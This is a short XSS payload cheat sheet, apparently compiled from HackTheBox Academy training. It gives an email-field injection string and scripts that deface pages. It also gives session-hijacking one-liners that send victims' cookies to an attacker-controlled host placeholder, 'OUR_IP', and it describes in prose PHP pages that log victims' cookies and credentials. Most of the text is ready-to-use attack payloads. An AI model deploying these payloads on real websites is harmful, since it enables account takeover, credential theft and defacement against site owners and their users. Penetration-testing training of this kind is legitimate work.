List of useful payloads, tips and tricks about XSS gathered with time
To be tried and inserted in email fields
"<img/src/onerror=alert(0)"@xss.com
Payloads List
Defacing
Attacker can take advantage of stored XSS to change the look of the web application and cause damages to the company facing website. Attackers may deface a website to prove the compromise on the target. Website defacement can cause important impacts on a company business and affairs.
# Change page title
<script>document.title = 'HackTheBox Academy'</script>
# Change Background
<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
# Change page text
document.getElementById("todo").innerHTML = "New Text"
document.getElementsByTagName('body')[0].innerHTML = "New Text"
Session hijacking payloads
These payloads can be writted in a script.js file hosted on the attacker web server.
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
PHP payloads for session hijacking
This payload writes down the victim cookies along with the associated IP into a file. This payload can be saved in a index.php file that is hosted on the attacker web server.
This payload looks for the username and password parameters in the URL and if exists it will write the username and password entered by the victim in a file named creds.txt. Then, it will redirect the user to a legitimate page.